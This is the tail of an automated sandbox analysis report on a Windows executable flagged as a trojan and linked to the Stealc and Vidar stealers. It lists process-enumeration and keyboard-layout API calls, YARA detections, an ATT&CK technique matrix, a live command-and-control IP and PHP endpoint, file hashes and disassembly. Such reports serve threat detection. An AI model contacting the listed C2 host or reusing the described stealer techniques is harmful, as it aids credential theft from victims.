                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419790
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02409B47 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_02409B47
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_024099F7 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_024099F7
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_02436A0F cpuid 0_2_02436A0F
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417D20
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_02407F87
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00418CF0 GetSystemTime,0_2_00418CF0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
                      Source: C:\Users\user\Desktop\8WOUWb5iEv.exeCode function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417BC0
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.8WOUWb5iEv.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.8WOUWb5iEv.exe.2500000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.8WOUWb5iEv.exe.2500000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.8WOUWb5iEv.exe.23f0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.8WOUWb5iEv.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.8WOUWb5iEv.exe.23f0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8WOUWb5iEv.exe PID: 6720, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.8WOUWb5iEv.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.8WOUWb5iEv.exe.2500000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.8WOUWb5iEv.exe.2500000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.8WOUWb5iEv.exe.23f0e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.8WOUWb5iEv.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.8WOUWb5iEv.exe.23f0e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8WOUWb5iEv.exe PID: 6720, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API
                      1
                      Create Account
                      11
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      2
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory31
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection
                      NTDS11
                      Process Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Account Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Owner/User Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc Filesystem133
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      8WOUWb5iEv.exe42%ReversingLabsWin32.Trojan.Generic
                      8WOUWb5iEv.exe40%VirustotalBrowse
                      8WOUWb5iEv.exe100%AviraHEUR/AGEN.1306992
                      8WOUWb5iEv.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                      http://upx.sf.net0%URL Reputationsafe
                      http://77.83.175.1057%VirustotalBrowse
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://77.83.175.105/18a9a962225b1ffb.phptrue
                        unknown
                        http://77.83.175.105/true
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://77.83.175.105/18a9a962225b1ffb.php%:8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://77.83.175.105;8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://77.83.175.105/18a9a962225b1ffb.phpk:8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://77.83.175.105/d:iU8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://77.83.175.1058WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                                  https://docs.rs/getrandom#nodejs-es-module-support8WOUWb5iEv.exe, 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://77.83.175.105/7:8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://upx.sf.netAmcache.hve.3.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://77.83.175.105/18a9a962225b1ffb.php48WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://77.83.175.105/18a9a962225b1ffb.phpT8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://77.83.175.105/AL8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          77.83.175.105
                                          unknownUkraine
                                          204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1544236
                                          Start date and time:2024-10-29 04:56:06 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 4m 36s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:8
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:8WOUWb5iEv.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:dbfb5a1fee1df3d86b1cdba9e338b31d.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@2/5@0/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 23
                                          • Number of non-executed functions: 198
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          TimeTypeDescription
                                          23:57:22API Interceptor1x Sleep call for process: WerFault.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          77.83.175.105X9d3758tok.exeGet hashmaliciousStealc, VidarBrowse
                                          • 77.83.175.105/18a9a962225b1ffb.php
                                          KMfWqiiMu0.exeGet hashmaliciousStealc, VidarBrowse
                                          • 77.83.175.105/18a9a962225b1ffb.php
                                          hwWxZRwpeL.exeGet hashmaliciousStealc, VidarBrowse
                                          • 77.83.175.105/18a9a962225b1ffb.php
                                          KTvTgKJSyw.exeGet hashmaliciousStealc, VidarBrowse
                                          • 77.83.175.105/18a9a962225b1ffb.php
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ON-LINE-DATAServerlocation-NetherlandsDrontenNLX9d3758tok.exeGet hashmaliciousStealc, VidarBrowse
                                          • 77.83.175.105
                                          KMfWqiiMu0.exeGet hashmaliciousStealc, VidarBrowse
                                          • 77.83.175.105
                                          hwWxZRwpeL.exeGet hashmaliciousStealc, VidarBrowse
                                          • 77.83.175.105
                                          KTvTgKJSyw.exeGet hashmaliciousStealc, VidarBrowse
                                          • 77.83.175.105
                                          s4aALx5IMD.exeGet hashmaliciousStealcBrowse
                                          • 92.119.114.74
                                          CIVHRLlEUk.exeGet hashmaliciousStealcBrowse
                                          • 92.119.114.74
                                          aDHzARrzIa.exeGet hashmaliciousStealcBrowse
                                          • 92.119.114.74
                                          AkWvbt4CFh.exeGet hashmaliciousStealcBrowse
                                          • 92.119.114.74
                                          vkkTIT6kcx.exeGet hashmaliciousStealc, VidarBrowse
                                          • 92.119.114.74
                                          2YHpql8v3B.exeGet hashmaliciousStealcBrowse
                                          • 45.88.76.205
                                          No context
                                          No context
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.9623890843732951
                                          Encrypted:false
                                          SSDEEP:192:8orikK0n5dPRojxCZrMZtzuiFGZ24IO8P:8zkR51RojDTzuiFGY4IO8P
                                          MD5:1BB724A31803EB1FFDF2CC38C3484E6E
                                          SHA1:1093E3DDF5B63F2BE10BB8000D34FEF2D2FE52B0
                                          SHA-256:0BB83B30DCEFC11BDA000F6B00FD898F698B2E0D603975B4C1B207B8880E5C05
                                          SHA-512:E49268AF443FCBEA66B5908223DF72BC8CE2EB75A47F307F7146041AF3B717436488A1A8C0EA581C69D07B81E61CEBB5C0EE1354CB54A58B60484F84AED22403
                                          Malicious:true
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.6.4.7.8.1.9.5.1.6.8.1.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.6.4.7.8.2.0.0.3.2.4.3.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.f.1.1.1.3.e.-.2.f.5.8.-.4.f.e.5.-.9.3.7.2.-.4.3.5.8.3.3.7.c.6.7.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.3.3.e.5.e.c.-.9.7.4.f.-.4.7.8.7.-.a.7.4.e.-.2.9.e.a.2.2.0.e.c.1.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.W.O.U.W.b.5.i.E.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.0.-.0.0.0.1.-.0.0.1.4.-.9.d.4.6.-.0.2.9.9.b.6.2.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.a.d.c.4.5.b.e.d.8.4.6.7.e.4.5.f.1.a.1.e.2.1.6.1.e.e.4.9.e.6.5.0.0.0.0.f.f.f.f.!.0.0.0.0.8.a.d.3.a.c.1.b.5.6.5.6.3.0.8.9.1.c.9.6.5.f.5.4.f.4.c.1.4.4.d.a.1.2.5.f.5.7.2.c.!.8.W.O.U.W.b.5.i.E.v...e.x.e.....T.a.r.g.e.t.A.p.p.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 29 03:56:59 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):65322
                                          Entropy (8bit):1.9134502860220912
                                          Encrypted:false
                                          SSDEEP:384:9s7USbnaXTWsE3RTKSnWwmeKsoukjdjUsG3:wUSOXKsElnW0xkHs
                                          MD5:D065A0DD76C33B56FA5DDA49A366C8DA
                                          SHA1:B2A2B6AAA041AF3553D6AD9C0F523031656EF4AD
                                          SHA-256:F57F053F39CAFACEFD38D4662288CB18E3F94177E8A5BDF2E03C83F9108277DB
                                          SHA-512:7DAA39E89947F9D7BF652DD5C95ADD021C18260A1850F30B617B88F729BD5360DA55E8964E030FA2423B2049BB8705C93650B6DAB95F9EEF0D2DC5065DDF5E93
                                          Malicious:false
                                          Reputation:low
                                          Preview:MDMP..a..... ........] g............4...............<.......$....*..........T.......8...........T...........P3..........................................................................................................eJ......H.......GenuineIntel............T.......@....] g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8336
                                          Entropy (8bit):3.695327487186007
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJd/6dYvgDb8H6Y9BSU9VIYgmfmxxv5X5SpDM89bYXsfPnom:R6lXJ16dYw8H6YLSU9VIYgmfm+YcfV
                                          MD5:F379BE91720509FD5347B3129D878756
                                          SHA1:7EEF0CF53EB886033779AA5C31D63D07A002E726
                                          SHA-256:A03BAAE536235AB4744F8D62725561D146F6FEA2DC16AAD9F1A655B230547ABB
                                          SHA-512:835034EDCA4BC530565A4F73EEA91B354ED7F442863C3441DA26FD59445BDBFD5B9D23B3C5153600B5A9609A2F481CC01C39AA86D98E01FE13DE83CF9AA1D31D
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.2.0.<./.P.i.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4579
                                          Entropy (8bit):4.46759052541111
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsiJg77aI9e5WpW8VYuvYm8M4JeDyrLiyrw6Ff+q8OyXEyN1w6o8izqhU:uIjfwI7AI7VpyJwWuawQD4E+u6ovqhed
                                          MD5:FD66574728F349FBE8B9ADF10F81C7D4
                                          SHA1:B5CA71AE8129C05AC099CAC40E522314142CC5B8
                                          SHA-256:7592A6A8F919AF034E38ADB59ACD99DCAE3211FE205B5D66BC58A0C0A304A4FB
                                          SHA-512:DAFDBD5886CBEFD08B24133E7CD967DFF41F0E795F18E1F22DCC60C65D9FF597E6F5C4CFD4EA08D813257515F00D6D6F28EB5729D8BA1E08B3D7347A6A3B9034
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="564179" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.465444243669975
                                          Encrypted:false
                                          SSDEEP:6144:JIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNedwBCswSbu:6XD94+WlLZMM6YFHA+u
                                          MD5:173BE4DA0ED55B370AA5075122739CE6
                                          SHA1:DCCE1BB30F3A9E75FF6B7B59DF9B4554B78BAA6A
                                          SHA-256:F44D89B91AA329C3DA4C2A6201F739A03BF377710AD9A609EE50B86D72CAC47F
                                          SHA-512:70A945126D16268F991B8A09EDCD37DD0B534EB6594CA61A652CB37CAFEDE948E7E6DB326DC94999ED6A0E36259B0F1D98E6824558C2C9CF56E80F1011687C7A
                                          Malicious:false
                                          Reputation:low
                                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN{...)..............................................................................................................................................................................................................................................................................................................................................^..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.276843705662776
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:8WOUWb5iEv.exe
                                          File size:712'192 bytes
                                          MD5:dbfb5a1fee1df3d86b1cdba9e338b31d
                                          SHA1:8ad3ac1b565630891c965f54f4c144da125f572c
                                          SHA256:54fa4544762fb14d407756fad69201bfaccc8db821a94e63079531d556cddeb1
                                          SHA512:7a9993a1031aadd95bbd903e5aa6b671153106801b07e59da752aed8975c4fda3a762af9f3edc377c5632e19279913f6aa3a183162aee885871bb07931581f85
                                          SSDEEP:12288:oT21qIgEAUr7vJvnjBaU/n0K4TnYzUSHzYlQM7vWF6M/Ukk:oKkILAUr7v7aU/0KaU3z/MjW18kk
                                          TLSH:E1E412953880E1B1D8154170EC7D8AF42F7BFC279A75A69733283F9F3971281AAE6311
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\..A\..A\..AB.tAG..AB.eAB..AB.sA8..A{..A[..A\..A(..AB.zA]..AB.dA]..AB.aA]..ARich\..A........................PE..L....L.d...
                                          Icon Hash:63796de971636e0f
                                          Entrypoint:0x405edb
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x64F64CAB [Mon Sep 4 21:31:23 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:0
                                          File Version Major:5
                                          File Version Minor:0
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:0
                                          Import Hash:eaddeabe4dc2146d8bbc6de524b45db8
                                          Instruction
                                          call 00007F4264EDF406h
                                          jmp 00007F4264EDB16Eh
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          call 00007F4264EDB32Ch
                                          xchg cl, ch
                                          jmp 00007F4264EDB314h
                                          call 00007F4264EDB323h
                                          fxch st(0), st(1)
                                          jmp 00007F4264EDB30Bh
                                          fabs
                                          fld1
                                          mov ch, cl
                                          xor cl, cl
                                          jmp 00007F4264EDB301h
                                          mov byte ptr [ebp-00000090h], FFFFFFFEh
                                          fabs
                                          fxch st(0), st(1)
                                          fabs
                                          fxch st(0), st(1)
                                          fpatan
                                          or cl, cl
                                          je 00007F4264EDB2F6h
                                          fldpi
                                          fsubrp st(1), st(0)
                                          or ch, ch
                                          je 00007F4264EDB2F4h
                                          fchs
                                          ret
                                          fabs
                                          fld st(0), st(0)
                                          fld st(0), st(0)
                                          fld1
                                          fsubrp st(1), st(0)
                                          fxch st(0), st(1)
                                          fld1
                                          faddp st(1), st(0)
                                          fmulp st(1), st(0)
                                          ftst
                                          wait
                                          fstsw word ptr [ebp-000000A0h]
                                          wait
                                          test byte ptr [ebp-0000009Fh], 00000001h
                                          jne 00007F4264EDB2F7h
                                          xor ch, ch
                                          fsqrt
                                          ret
                                          pop eax
                                          jmp 00007F4264EDB92Fh
                                          fstp st(0)
                                          fld tbyte ptr [0049308Ah]
                                          ret
                                          fstp st(0)
                                          or cl, cl
                                          je 00007F4264EDB2FDh
                                          fstp st(0)
                                          fldpi
                                          or ch, ch
                                          je 00007F4264EDB2F4h
                                          fchs
                                          ret
                                          fstp st(0)
                                          fldz
                                          or ch, ch
                                          je 00007F4264EDB2E9h
                                          fchs
                                          ret
                                          fstp st(0)
                                          jmp 00007F4264EDB905h
                                          fstp st(0)
                                          mov cl, ch
                                          jmp 00007F4264EDB2F2h
                                          call 00007F4264EDB2BEh
                                          jmp 00007F4264EDB910h
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          push ebp
                                          mov ebp, esp
                                          Programming Language:
                                          • [C++] VS2008 build 21022
                                          • [ASM] VS2008 build 21022
                                          • [ C ] VS2008 build 21022
                                          • [IMP] VS2005 build 50727
                                          • [RES] VS2008 build 21022
                                          • [LNK] VS2008 build 21022
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x921540x50.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x14948.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2eb0000xa00.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x47f80x40.text
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x184.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
